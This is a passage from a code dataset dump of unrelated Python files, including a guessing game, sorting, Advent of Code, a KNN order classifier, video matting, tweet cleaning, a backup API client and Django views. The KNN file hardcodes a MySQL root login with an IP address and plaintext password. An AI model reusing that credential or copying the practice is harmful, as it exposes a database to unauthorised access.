seguintes: \\n 1- O número sorteado está entre 0 e 20 \\n 2- Você tem 6 chances para tentar acertar o número \\n 3- A cada erro, eu te darei uma dica de aproximação. \\nBoa sorte! \")\ncount = 1\nprint (\"Já sorteei o número.\")\nnum_sorteado = random.randint(0,20)\nprint (f\"{num_sorteado}\")\nprint (\"Digite sua aposta:\")\nnum_tentativa_user = input()\nwhile (count < 6):\n if (int(num_sorteado) < int(num_tentativa_user)):\n count += 1\n print(\"O número sorteado é menor. Tente novamente:\")\n num_tentativa_user = input()\n elif (int(num_sorteado) > int(num_tentativa_user)):\n count += 1\n print(\"O número sorteado é maior. Tente novamente:\")\n num_tentativa_user = input()\n elif (int(num_sorteado) == int(num_tentativa_user)):\n print(f\"Você acertou em {count} tentativa(s) \\nNúmero sorteado: {num_sorteado}\") \n break\nelse:\n if (int(count) == 6 and int(num_sorteado) != int(num_tentativa_user)):\n print(f\"Sinto muito, suas tentativas acabaram! \\nNúmero sorteado: {num_sorteado}\")\n elif(int(count) == 6 and int(num_sorteado) == int(num_tentativa_user)):\n print(f\"Você acertou! \\nNúmero sorteado: {num_sorteado}\")","sub_path":"Python-Exercises/desafio02.py","file_name":"desafio02.py","file_ext":"py","file_size_in_byte":1350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"15144142","text":"#!/usr/bin/env python3\n\ndef qsort(arr):\n if len(arr) > 1:\n pivot = arr[0]\n upper = [x for x in arr if x > pivot]\n equal = [x for x in arr if x == pivot]\n lower = [x for x in arr if x < pivot]\n result = qsort(lower) + equal + qsort(upper)\n print(\" \".join(map(str,result)))\n return result\n \n else : return arr\n\nn = int(input())\nl = list(map(int, input().split(' ')))\n\nqsort(l)\n","sub_path":"Competitive Programming/hackerrank/Algorithm/Sorting/qsort2.py","file_name":"qsort2.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"106352959","text":"# -*- coding: utf-8 -*-\n\nfrom appconf import AppConf\nfrom django import template\nfrom django.conf import settings\nfrom django.template.base import TextNode\n\nfrom .. import jq_version\n\n\nregister\t\t = template.Library()\n\n\nclass _AppConf(AppConf):\n\tVERSION\t\t\t\t = jq_version\n\tCDN\t\t\t\t\t = False\n\tDEFAULT_CDN\t\t\t = 'http://code.jquery.com/jquery-%(version)s.min.js'\n\n\tSTATIC_JS\t\t\t = '%(static_url)sjquery/jquery-%(version)s.min.js'\n\n\tSCRIPT_TAG\t\t\t = ''\n\n\tclass Meta:\n\t\tprefix\t\t\t = \"JQUERY\" # appconf cannot determine the prefix here!\n\n\n\n@register.tag\ndef jquery_js(parser, token):\n\tbits\t = tuple(token.split_contents()) + (None, None)\n\tversion\t = bits[1] or settings.JQUERY_VERSION\n\tcdn\t\t = settings.JQUERY_CDN\n\tif cdn:\n\t\tif cdn is True:\n\t\t\tcdn = settings.JQUERY_DEFAULT_CDN\n\t\turl\t = cdn % {'version': version}\n\telse:\n\t\turl\t = settings.JQUERY_STATIC_JS % {\n\t\t\t'static_url': settings.STATIC_URL, 'version': version}\n\n\tres\t = settings.JQUERY_SCRIPT_TAG % {'url': url}\n\treturn TextNode(res)\n\n","sub_path":"venv/Lib/site-packages/jquery/templatetags/jquery.py","file_name":"jquery.py","file_ext":"py","file_size_in_byte":1035,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"393069417","text":"f = open('files/day19.txt')\nimport re\n\ninp = list()\nfor line in f:\n inp.append(line)\n\ncount = 0\ndirection ='down'\ndown = True\nright = False\nleft = False\nup = False\n\n\ndef new_direction(x,y,inp, direction):\n if inp[y][x+1] == '-' and direction != 'left':\n return 'right'\n if inp[y][x-1] == '-' and direction != 'right':\n return 'left'\n try:\n if inp[y-1][x] == '|' and direction != 'down':\n return 'up'\n except Exception:\n print('!!!!!!!')\n pass\n if inp[y+1][x] == '|' and direction != 'up':\n return 'down'\n else:\n return 'end'\n\ndef is_letter(char_1):\n letters = ('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z')\n\n if char_1 in letters:\n return True\n\ny = 0\nx = 0\n\nfor index, letter in enumerate(inp[x]):\n if letter == '|':\n x = index\n\n\n\nwhile direction != 'end':\n while direction == 'down':\n if is_letter(inp[y+1][x]):\n y = y + 1\n count = count + 1\n\n if inp[y+1][x]=='|' or inp[y+1][x] == '-':\n y = y + 1\n count = count + 1\n\n if inp[y+1][x]=='+':\n y = y+1\n count = count + 1\n\n direction = new_direction(x,y, inp, direction)\n\n while direction == 'up':\n if is_letter(inp[y-1][x]):\n y = y - 1\n count = count + 1\n\n if inp[y-1][x]=='|' or inp[y-1][x] == '-':\n y = y - 1\n count = count + 1\n\n if inp[y - 1][x] == '+':\n y = y - 1\n count = count + 1\n\n direction = new_direction(x, y, inp, direction)\n\n\n while direction == 'right':\n if is_letter(inp[y][x+1]):\n x = x + 1\n count = count + 1\n\n if inp[y][x+1]=='|' or inp[y][x+1] == '-':\n x = x + 1\n count = count + 1\n\n if inp[y][x+1]=='+':\n x = x+1\n count = count + 1\n\n direction = new_direction(x,y, inp, direction)\n\n\n\n while direction == 'left':\n if is_letter(inp[y][x-1]):\n x = x - 1\n count = count + 1\n\n if inp[y][x-1]=='|' or inp[y][x-1] == '-':\n x = x - 1\n count = count + 1\n\n if inp[y][x-1]=='+':\n x = x-1\n count = count + 1\n\n direction = new_direction(x,y, inp, direction)\n\n print(count)\n\n","sub_path":"Day_19pt2.py","file_name":"Day_19pt2.py","file_ext":"py","file_size_in_byte":2399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"486203695","text":"#encoding=utf-8\nimport sys\nimport io\nsys.stdout = io.TextIOWrapper(sys.stdout.buffer, encoding='utf-8')\n\nimport pymysql\nimport numpy as np\nimport pandas as pd \nimport operator\nimport math\nfrom numpy import *\nimport sys\nclass is_order(object):\n def __init__(self,items):\n self.items=items\n #获取数据\n self.datas=self.get_data(self.items)\n #print(self.datas[-1::-50])\n #处理数据\n self.handleDatas=self.handle_data(self.datas)\n #print(self.datas[-1::-50])\n #数据归一化\n self.normDataSet=self.autoNorm(self.handleDatas)\n #print(self.normDataSet[-1::-50])\n \n \n \n #连接数据库获取数据并转成pandas形式\n def get_data(self,items):\n conn=pymysql.connect('120.78.86.208','root',\"543998\",\"hotelsys\")\n cursor=conn.cursor()\n try:\n sql='select deskcount,price,source,age,Scene,append,is_xiadan from `order`'\n cursor.execute(sql)\n results=cursor.fetchall() #返回所有的特征列数据\n columnDes = cursor.description #获取连接对象的描述信息\n #将数据转换成pandas\n columnNames = [columnDes[i][0] for i in range(len(columnDes))] \n datas= pd.DataFrame([list(i) for i in results],columns=columnNames)\n new=pd.DataFrame({'deskcount':items['deskcount'],\n 'price':items['price'],\n 'source':items['source'],\n 'age':items['age'],\n 'Scene':items['Scene'],\n 'append':items['append']},\n index=[0])\n datas=datas.append(new,ignore_index=True)\n except Exception:\n #如果发生异常,则回滚 \n print(\"发生异常\",Exception) \n conn.rollback()\n finally: \n #最终关闭数据库连接 \n conn.close()\n return datas\n \n #处理数据\n def handle_data(self,datas):\n #处理source数据 unique() 去重\n labels=datas['source'].unique().tolist() #得到labels['female', 'male']的列表\n '''\n 循环 data['sex']取出的值为 0,1 对应到 labels['female', 'male']中判断是哪个值再去这个值所在的索引\n 通过这种方法实现了将 'female','male'转为0,1值\n '''\n datas['source']=[ *map( lambda x:labels.index(x) , datas['source'] ) ] # *解包 map映射生成一个迭代器 需要*进行序列解包\n #print(data)\n \n #处理age 同上面处理方式\n labels=datas['age'].unique().tolist()\n datas['age']=datas['age'].apply( lambda x:labels.index(x) )\n \n #处理Scene\n labels=datas['Scene'].unique().tolist()\n datas['Scene']=datas['Scene'].apply( lambda x:labels.index(x) )\n \n #处理append\n labels=datas['append'].unique().tolist()\n datas['append']=datas['append'].apply( lambda x:labels.index(x) )\n \n #处理deskcount\n datas['deskcount']=list(map( int , datas['deskcount'] ))\n \n #处理deskcount\n datas['price']=list(map( int , datas['price'] ))\n \n return datas\n \n #数据归一化\n #新的分析 在距离运算公式中 价格对结果的影响是最大的 为了避免这种影响 我们采用归一化值进行处理\n #这样每个因素对结果的权重就统一了\n # 原理:将值取范围为0到1之间的值\n #运算公式:newValue=( oldValue-min )/( max-min )\n def autoNorm( self,datas ):\n minVals=datas.min(0) #min( num ):num为0表示每列的最小值 num为1表示每行的最小值\n maxVals=datas.max(0)\n ranges=maxVals-minVals\n normDataSet=np.zeros( np.shape(datas) )\n m=datas.shape[0]\n normDataSet=datas-np.tile( minVals,(m,1) ) #[价格的最小值]\n normDataSet=normDataSet/np.tile( ranges,(m,1) )\n return normDataSet\n \n \n #高斯函数\n def gaussian(self,dist,a=1,b=0,c=0.3):\n return a*math.e**( -(dist-b) ** 2 / ( 2*c**2 ) )\n #反函数\n def reservefun( self,distance,const ):\n return 1/( distance+const)\n #KNN分类判断用户是否下单\n #flag=isOrder.myKNeighborsClassifier( inX,features,lables )\n def myKNeighborsClassifier(self,inX,dataSet,lables,n_neighbors=5,weights='distance',p=2):\n dataSetSize=dataSet.shape[0] #求出数据集数据的行数\n #print(dataSetSize)\n #求出输入向量inX与数据集中各样本的距离(将输入向量复制行数与dataSet一样)\n# print( type(np.tile( inX,( dataSetSize,1 ) ) ))\n# print( np.tile( inX,( dataSetSize,1 ) ) )\n# print( type(dataSet) )\n# print( dataSet) \n# diffMat= np.array(np.tile( inX,( dataSetSize,1 ) ))-dataSet\n inX=np.array(np.tile( inX,( dataSetSize,1 ) ))\n #print(type(inX))\n #print(inX)\n # print( type(dataSet) )\n #print(type(dataSet))\n diffMat=inX-dataSet\n sqDiffMat=diffMat**p #秋平方\n sqDistances=sqDiffMat.sum( axis=1 ) #求和\n distances=sqDistances**( 1/p ) #开平方根\n \n '''\n p=1 : 曼哈顿距离\n p=2: 欧式距离\n p=∞ 它是各个坐标距离的最大值\n '''\n \n if weights=='distance':\n #采用距离加权法重新计算\n # 方案一: 反函数 weight=1/(distance+const) const任意常数 1就可\n #方案二: 高斯函数 f(x)=a*e^( -(x-b)^2/2c^2 )\n distances=self.gaussian( distances )\n elif weights=='uniform':\n distances=self.reservefun( distances,1 )\n \n sorteDistIndicies=distances.argsort() #numpy.argsort 返回对数组排序后的索引\n classCount={} #3:10 2:4 5:19\n \n #求出前k个数据的标签 并统计\n for i in range(n_neighbors):\n voteIlabel=lables[ sorteDistIndicies[i] ] #取出标签值 此sortedDistIndicies[i]表示第几个标签 是数字\n classCount[voteIlabel]=classCount.get( voteIlabel,0 )+1 #对每一个label进行计数\n # python2对字典的操作: classCount.iteritems() python3 classCount.items()\n sortedClassCount=sorted( classCount.items(),key=operator.itemgetter(1),reverse=True )\n #print( '',sortedClassCount )\n return sortedClassCount[0][0]\n \nif __name__=='__main__':\n\n if len(sys.argv) > 5:\n deskcount = sys.argv[1]\n price = sys.argv[2]\n source = sys.argv[3]\n age = sys.argv[4]\n Scene = sys.argv[5]\n append = sys.argv[6]\n items = {'deskcount': deskcount, 'price': price, 'source': source, 'age': age,\n 'Scene': Scene,\n 'append': append}\n isOrder=is_order(items)\n normDataSet=isOrder.normDataSet\n #print(normDataSet,'------------')\n lables=normDataSet['is_xiadan'][0:-1].values\n features=normDataSet.drop( ['is_xiadan'] ,axis=1).values[0:-1]\n #print(features,'***************')\n inX=normDataSet.drop(['is_xiadan'] ,axis=1).values[-1]\n flag=isOrder.myKNeighborsClassifier(inX, features, lables)\n print(flag)\n\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n ","sub_path":"源代码/FoodStreet/src/PythonFile/isOrder.py","file_name":"isOrder.py","file_ext":"py","file_size_in_byte":7451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"14063968","text":"import math\nimport multiprocessing\nimport re\nimport subprocess as sp\nimport time\nimport ffmpeg\nimport numpy as np\nimport torch\nimport sys\nfrom bg import DEVICE, Net, iter_frames, remove_many\n\n\ndef worker(worker_nodes,\n worker_index,\n result_dict,\n model_name,\n gpu_batchsize,\n total_frames,\n frames_dict):\n print(F\"WORKER {worker_index} ONLINE\")\n\n output_index = worker_index + 1\n base_index = worker_index * gpu_batchsize\n net = Net(model_name)\n script_net = None\n for fi in (list(range(base_index + i * worker_nodes * gpu_batchsize,\n min(base_index + i * worker_nodes * gpu_batchsize + gpu_batchsize, total_frames)))\n for i in range(math.ceil(total_frames / worker_nodes / gpu_batchsize))):\n if not fi:\n break\n\n # are we processing frames faster than the frame ripper is saving them?\n last = fi[-1]\n while last not in frames_dict:\n time.sleep(0.1)\n\n input_frames = [frames_dict[index] for index in fi]\n if script_net is None:\n script_net = torch.jit.trace(net,\n torch.as_tensor(np.stack(input_frames), dtype=torch.float32, device=DEVICE))\n\n\n result_dict[output_index] = remove_many(input_frames, script_net)\n\n # clean up the frame buffer\n for fdex in fi:\n del frames_dict[fdex]\n output_index += worker_nodes\n\n\ndef capture_frames(file_path, frames_dict, prefetched_samples, total_frames):\n print(F\"WORKER FRAMERIPPER ONLINE\")\n for idx, frame in enumerate(iter_frames(file_path)):\n frames_dict[idx] = frame\n while len(frames_dict) > prefetched_samples:\n time.sleep(0.1)\n if idx > total_frames:\n break\n\n\ndef parallel_greenscreen(file_path,\n worker_nodes=1,\n gpu_batchsize=4,\n model_name='u2net_human_seg',\n frame_limit=-1,\n prefetched_batches=4,\n framerate=-1):\n multiprocessing.set_start_method('spawn', force=True)\n manager = multiprocessing.Manager()\n\n results_dict = manager.dict()\n frames_dict = manager.dict()\n\n print(file_path)\n\n info = ffmpeg.probe(file_path)\n total_frames = int(info[\"streams\"][0][\"nb_frames\"])\n\n if frame_limit != -1:\n total_frames = min(frame_limit, total_frames)\n\n fr = info[\"streams\"][0][\"r_frame_rate\"]\n\n if framerate == -1:\n print(F\"FRAME RATE DETECTED: {fr} (if this looks wrong, override the frame rate)\")\n framerate = math.ceil(eval(fr))\n\n print(F\"FRAME RATE: {framerate} TOTAL FRAMES: {total_frames}\")\n\n p = multiprocessing.Process(target=capture_frames,\n args=(file_path, frames_dict, gpu_batchsize * prefetched_batches, total_frames))\n p.start()\n\n # note I am deliberatley not using pool\n # we can't trust it to run all the threads concurrently (or at all)\n workers = [multiprocessing.Process(target=worker,\n args=(worker_nodes, wn, results_dict, model_name, gpu_batchsize, total_frames,\n frames_dict))\n for wn in range(worker_nodes)]\n for w in workers:\n w.start()\n\n command = None\n proc = None\n frame_counter = 0\n for i in range(math.ceil(total_frames / worker_nodes)):\n for wx in range(worker_nodes):\n\n hash_index = i * worker_nodes + 1 + wx\n\n while hash_index not in results_dict:\n time.sleep(0.1)\n\n frames = results_dict[hash_index]\n # dont block access to it anymore\n del results_dict[hash_index]\n\n for frame in frames:\n if command is None:\n command = ['ffmpeg',\n '-y',\n '-f', 'rawvideo',\n '-vcodec', 'rawvideo',\n '-s', F\"{frame.shape[1]}x320\",\n '-pix_fmt', 'gray',\n '-r', F\"{framerate}\",\n '-i', '-',\n '-an',\n '-vcodec', 'mpeg4',\n '-b:v', '2000k',\n re.sub(r\"\\.(mp4|mov|avi)\", r\".matte.\\1\", file_path, flags=re.I)]\n\n proc = sp.Popen(command, stdin=sp.PIPE)\n\n proc.stdin.write(frame.tostring())\n frame_counter = frame_counter + 1\n\n if frame_counter >= total_frames:\n p.join()\n for w in workers:\n w.join()\n proc.stdin.close()\n proc.wait()\n print(F\"FINISHED ALL FRAMES ({total_frames})!\")\n return\n\n p.join()\n for w in workers:\n w.join()\n proc.stdin.close()\n proc.wait()\n","sub_path":"u2net/multiproc.py","file_name":"multiproc.py","file_ext":"py","file_size_in_byte":5062,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"636511797","text":"# My implementation of the coding challenge\n# -*- coding: UTF-8 -*-\n# TO DO:\n# Identify Non ASCI codes in UNICODE string\n\nimport io\nimport os\nimport sys\nimport json\nimport codecs\nimport string\n\n#import future # requires pip install\nfrom os import path\n\ndef isUnicode(s): # \n # if encode and decode equals the original\n # than it doesnt have special characters\n encoded_text = s.encode(\"ascii\", \"ignore\")\n decoded_text = encoded_text.decode('utf-8')\n if decoded_text == s:\n return False\n return True\n \nif __name__ == \"__main__\":\n \n\n #0.1 input parameters\n RAW_TWEETS_FILE = sys.argv[1]\n CLEANED_TWEETS_FILE = sys.argv[2]\n \n with io.open(RAW_TWEETS_FILE,encoding='utf-8') as f: \n Unicode_Tweets_Count = 0; \n \n raw_tweet_text = \"\"\n created_at_text = \"\"\n if path.isfile(CLEANED_TWEETS_FILE):\n try:\n os.remove(CLEANED_TWEETS_FILE)\n except OSError:\n pass\n \n fout = open(CLEANED_TWEETS_FILE,\"a+\",)\n print('Starting the first part of the challenge')\n \n for line in f:\n tweet = json.loads(line)\n #1.1 Extract text from the tweet\n \n # Checking if that is a valid tweet:\n if 'text' in tweet:\n \n raw_tweet_text = tweet['text']\n raw_tweet_text = raw_tweet_text.replace('\\n', ' ')\n raw_tweet_text = raw_tweet_text.replace('\\t', ' ')\n\n encoded_tweet_text = raw_tweet_text.encode(\"ascii\", \"ignore\")\n no_white_space_tweet = encoded_tweet_text.strip()\n\n if isUnicode(raw_tweet_text):\n Unicode_Tweets_Count +=1\n \n #1.3 Extract timestamp: \n timestamp_text = \" (timestamp: \" + tweet['created_at'] + \")\"\n \n fout.write(no_white_space_tweet + timestamp_text + \"\\n\")\n \n # close the file when done\n fout.write('\\n' + str(Unicode_Tweets_Count) + \" tweets contained unicode\")\n fout.close()\n \n #print \"the file had \" + str(linecount) + \" tweets\" # DEBUG LINE\n #print str(Unicode_Tweets_Count) + \" tweets contained unicode\" # DEBUG LINE\n ","sub_path":"src/tweets_cleaned.py","file_name":"tweets_cleaned.py","file_ext":"py","file_size_in_byte":2030,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"396918231","text":"import json\nimport zlib\nfrom random import random\nfrom httplib import HTTPSConnection\nfrom hashlib import sha512 as sha\nfrom urllib import urlencode\n\nfrom config import config, status as client_status\n\n\nclass Api(object):\n BOUNDARY = '-' * 20 + sha(str(random())).hexdigest()[:20]\n \n def __init__(self, host, port, uuid, key):\n self.conn = HTTPSConnection(host, port)\n self.base_params = {'uuid': uuid, 'key': key}\n \n def _send(self, path, data={}, files={}, method='POST'):\n data.update(self.base_params)\n headers = {'Accept': 'text/plain'}\n url = '/api/%s/' % path\n if files:\n body = self.encode_multipart_data(data, files)\n headers['Content-type'] = 'multipart/form-data; boundary=%s' % Api.BOUNDARY\n method = 'POST'\n else:\n body = urlencode(data)\n headers['Content-type'] = 'application/x-www-form-urlencoded'\n if method == 'GET':\n url = '%s?%s' % (url, body)\n body = None\n self.conn.request(method, url, body, headers)\n response = self.conn.getresponse()\n result = (response.status, response.read())\n self.conn.close()\n return result\n \n def encode_multipart_data(self, data={}, files={}):\n \"\"\" Returns multipart/form-data encoded data\n \"\"\"\n boundary = '--' + Api.BOUNDARY\n crlf = '\\r\\n'\n \n data_tpl = crlf.join((boundary,\n 'Content-Disposition: form-data; name=\"%(name)s\"',\n '',\n '%(value)s'))\n\n file_tpl = crlf.join((boundary,\n 'Content-Disposition: form-data; name=\"%(name)s\"; filename=\"%(name)s\"',\n 'Content-Type: application/octet-stream',\n '',\n '%(value)s'))\n \n def render(tpl, data):\n return [tpl % {'name': key,\n 'value': value} for key, value in data.iteritems()]\n \n result = render(data_tpl, data)\n if files:\n result.extend(render(file_tpl, files))\n result.append('%s--\\r\\n' % boundary)\n return crlf.join(result)\n \n def hi(self, uname):\n return self._send('hi', {'host': uname[1], 'uname': ' '.join(uname)})\n \n def set_fs(self, fs):\n return self._send('fs/set', files={'fs': zlib.compress(fs, 9)})\n \n def update_fs(self, changes):\n changes = zlib.compress(json.dumps(changes), 9)\n return self._send('fs/update', files={'changes': changes})\n \n def upload_log(self, entries):\n if len(entries) > 1:\n kwargs = {'files': {'entries': zlib.compress(';'.join(entries), 9)}}\n else:\n kwargs = {'data': {'entries': entries[0]}}\n return self._send('log', **kwargs)\n \n def get_schedule(self):\n data = {}\n if client_status.schedule:\n data['v'] = client_status.schedule['version']\n status, content = self._send('backup/schedule',\n data=data,\n method='GET')\n if status == 200:\n content = json.loads(content)\n return status, content\n \n def get_files(self):\n data = {}\n if client_status.files_hash:\n data['fhash'] = client_status.files_hash\n return self._send('backup/files', data=data, method='GET')\n\n def get_s3_access(self):\n status, content = self._send('backup/access', method='GET')\n if status == 200:\n content = json.loads(content)\n return status, content\n \n def set_backup_info(self, status, **kwargs):\n backup_id = kwargs.pop('backup_id', None)\n allowed = ('time', 'size', 'keyname', 'files')\n data = {k: v for k, v in kwargs.iteritems() if k in allowed}\n if backup_id:\n data['id'] = backup_id\n s, c = self._send('backup/%s' % status, data)\n if not backup_id and s == 200:\n c = int(c)\n return s, c\n \n def set_databases(self, databases):\n return self._send('databases', data={'db': json.dumps(databases)})[0]\n\n def report_crash(self, info, when):\n return self._send('crash',\n data={'time': when},\n files={'info': zlib.compress(info, 9)})[0]\n \n def check_restore(self):\n status, content = self._send('backup/restore', method='GET')\n if status == 200 and content:\n content = json.loads(content)\n return status, content\n\n def restore_complete(self, tasks):\n return self._send('backup/restore/complete',\n data={'tasks': ','.join(map(str, tasks))})[0]\n\n\napi = Api(config.host, config.port, config.uuid, client_status.key)\n","sub_path":"bitcalm/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":4899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"639748310","text":"from nameserver import NameServer\nfrom dataserver import DataServer\n\nnumReplicate = 3\n\ndef main():\n global numReplicate\n ns = NameServer(numReplicate)\n ds1 = DataServer(\"node1\")\n ds2 = DataServer(\"node2\")\n ds3 = DataServer(\"node3\")\n ds4 = DataServer(\"node4\")\n \n ns.add(ds1)\n ns.add(ds2)\n ns.add(ds3)\n ns.add(ds4)\n\n ds1.start()\n ds2.start()\n ds3.start()\n ds4.start()\n\n # print(\"===\")\n ns.operator()\n '''\n print(\"?????\")\n ds1.join()\n ds2.join()\n ds3.join()\n ds4.join()\n '''\n\n return 0\n\nif __name__ == '__main__':\n main()\n","sub_path":"proj3/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"259754854","text":"# 1. Stwórz listę przedmiotów, które zabierzesz na samotną wyprawę w góry. Elementy na liście posortuj alfabetycznie,\r\n# a następnie wyświetl.\r\ntrip = ['namiot', 'śpiwór', 'siekiera']\r\nprint(sorted(trip))\r\n\r\n# 2. Pobierz od użytkownika 10 liczb, wyświetl tylko te, które są nieparzyste.\r\nfew = []\r\nfewpar = []\r\n\r\nfor i in range(1, 11):\r\n few.append(int(input(f\"Podaj {i}-ą liczbę: \")))\r\n\r\nfewpar = []\r\nprint(few)\r\nfor x in range(10):\r\n if few[x] % 2 == 0:\r\n fewpar.append(few[x])\r\n\r\nprint(f'Liczbami parzytymi są {fewpar}.')\r\n\r\n# 3. Dla podanej przez użytkownika liście liczb całkowitych sprawdź czy pierwszy i ostatni element są takie same.\r\nlistln = input('Wpisz kilka liczb rozdielonych przecinkiem:')\r\nlistln = listln.split(',')\r\n\r\nif listln[0] == listln[-1]:\r\n print('Taki sam.')\r\nelse:\r\n print(\"Różne.\")\r\n# 4. Pobierz od użytkownika parzystą listę elementów. Sprawdź czy 2 środkowe elementy są takie same.\r\nfew = input('Wpisz 10 liczb rozdielonych przecinkiem:')\r\nfew2 = few.split(',')\r\nhow_many = len(few2)\r\nmid = int(how_many / 2)\r\nprint(few2, mid)\r\nif few2[mid-1] == few2[mid]:\r\n print(f\"Środkowe elementy {few2[mid-1]} oraz {few2[mid]} są takie same!\")\r\nelse:\r\n print(f\"Środkowe elementy {few2[mid-1]} oraz {few2[mid]} nie są takie same!\")\r\n\r\n# 5.Utwórz “na sztywno” 2-wymiarową tablicę, tak, by kolejne wiersze zawierały dane osób, natomiast w kolumnach będzie\r\n# znajdować się imię, nazwisko, zawód, np:\r\n# Dorota, Wellman, dziennikarka\r\n# Adam, Małysz, sportowiec\r\n# Robert, Lewandowski, piłkarz\r\n# Krystyna, Janda, aktorka\r\n# Wyświetl w sposób przyjazny dla użytkownika\r\nlist2D = [\r\n ['Dorota', 'Wellman', 'dziennikarka'],\r\n ['Adam', 'Małysz', 'sportowiec'],\r\n ['Robert', 'Lewandowski', 'piłkarz'],\r\n ['Krystyna', 'Janda', 'aktorka']\r\n ]\r\nfor row in list2D:\r\n print('-'.join(row))\r\n","sub_path":"BASIC/04_Kolekcje/Listy.py","file_name":"Listy.py","file_ext":"py","file_size_in_byte":1897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"166495717","text":"# -*- coding: utf-8 -*-\nimport contextlib\nimport datetime\n\n\n@contextlib.contextmanager\ndef log_time(*text):\n print(*text, end=\"...\", flush=True)\n start_time = datetime.datetime.now()\n yield\n print(\"done in %.2fs\" % (datetime.datetime.now() - start_time).total_seconds())\n\n\ndef print_loop(iter, *text):\n for i, item in enumerate(iter):\n print('\\r>> ', *text, end=\" \" + str(i), flush=True)\n yield item\n","sub_path":"src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"481817098","text":"from django.shortcuts import render\n\n# Create your views here.\nfrom django.views import View\nfrom rest_framework.views import APIView\n\nfrom adoption import logics\nfrom authentication.permissions import *\nfrom backend.config.client_response.response_status import ResponseStatusEnum\nfrom common.exception.childf_exception import ChildfException, exception_handler\nfrom common.util.response_utils import ResponseUtils\nfrom person.models import Hamyar\nfrom person.serializers import MadadjuSerializer, LightMadadjuSerializer\n\n\nclass AllAdoptionsByHamyarAPI(APIView):\n def get(self,request):\n try:\n user = login_required(request)\n check_permission(member=Hamyar, user=user)\n resp_data = LightMadadjuSerializer(logics.get_all_madadjus_by_hamyar(user),many=True).data\n resp_status = ResponseStatusEnum.ok_200\n except Exception as e:\n resp_data, resp_status = exception_handler(e)\n return ResponseUtils.jsonify(response_enum_obj=resp_status.value, data=resp_data)\n\n\nclass AdoptAPI(APIView):\n def get(self, request, madadju_id):\n try:\n user = login_required(request)\n check_permission(member=Hamyar, user=user)\n logics.adopt(madadju_id, user)\n resp_data = \"adopted successfully\"\n resp_status = ResponseStatusEnum.ok_200\n except Exception as e:\n resp_data, resp_status = exception_handler(e)\n return ResponseUtils.jsonify(response_enum_obj=resp_status.value, data=resp_data)\n\n\nclass AllUnAdoptedMadadjuAPI(APIView):\n def get(self,request):\n try:\n user = login_required(request)\n check_permission(member=Hamyar, user=user)\n resp_data = LightMadadjuSerializer(logics.get_all_unadopted_madadju(),many=True).data\n resp_status = ResponseStatusEnum.ok_200\n except Exception as e:\n resp_data, resp_status = exception_handler(e)\n return ResponseUtils.jsonify(response_enum_obj=resp_status.value, data=resp_data)\n","sub_path":"adoption/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"450961709","text":"__copyright__ = \\\n \"\"\"\n # This code is base on \n # CenterNet (https://github.com/xingyizhou/CenterNet)\n Copyright ©right © (c) 2020 The Board of xx University.\n All rights reserved.\n\n This software is covered by China patents and copyright.\n This source code is to be used for academic research purposes only, and no commercial use is allowed.\n \"\"\"\n__authors__ = \"\"\n__version__ = \"1.0.0\"\n\nimport numpy as np\nimport cv2\nimport torch\n\n\n\ndef gaussian_radius(det_size, min_overlap=0.8):\n height, width = det_size\n\n a1 = 1\n b1 = (height + width)\n c1 = width * height * (1 - min_overlap) / (1 + min_overlap)\n sq1 = np.sqrt(b1 ** 2 - 4 * a1 * c1)\n r1 = (b1 - sq1) / (2 * a1)\n\n a2 = 4\n b2 = 2 * (height + width)\n c2 = (1 - min_overlap) * width * height\n sq2 = np.sqrt(b2 ** 2 - 4 * a2 * c2)\n r2 = (b2 - sq2) / (2 * a2)\n\n a3 = 4 * min_overlap\n b3 = -2 * min_overlap * (height + width)\n c3 = (min_overlap - 1) * width * height\n sq3 = np.sqrt(b3 ** 2 - 4 * a3 * c3)\n r3 = (b3 + sq3) / (2 * a3)\n return min(r1, r2, r3)\n\n\ndef gaussian2D(shape, sigma=1):\n m, n = [(ss - 1.) / 2. for ss in shape]\n y, x = np.ogrid[-m:m + 1, -n:n + 1]\n\n h = np.exp(-(x * x + y * y) / (2 * sigma * sigma))\n h[h < np.finfo(h.dtype).eps * h.max()] = 0\n return h\n\n\ndef draw_umich_gaussian(heatmap, center, radius, k=1):\n diameter = 2 * radius + 1\n gaussian = gaussian2D((diameter, diameter), sigma=diameter / 6)\n\n x, y = int(center[0]), int(center[1])\n\n height, width = heatmap.shape[0:2]\n\n left, right = min(x, radius), min(height - x, radius + 1)\n top, bottom = min(y, radius), min(width - y, radius + 1)\n\n masked_heatmap = heatmap[x - left:x + right, y - top:y + bottom]\n masked_gaussian = gaussian[radius - left:radius + right, radius - top:radius + bottom]\n if min(masked_gaussian.shape) > 0 and min(masked_heatmap.shape) > 0:\n np.maximum(masked_heatmap, masked_gaussian * k, out=masked_heatmap)\n return heatmap\n\n\ndef generate_cls_mask(target_size, cls_locations_list, cls_ids_list, box_sizes_list=None, strategy=\"one-hot\"):\n \"\"\"\n generate the cls mask, the pixel is (w,h)\n :param target_size: tuple(b, h, w, c)\n :param cls_locations_list: 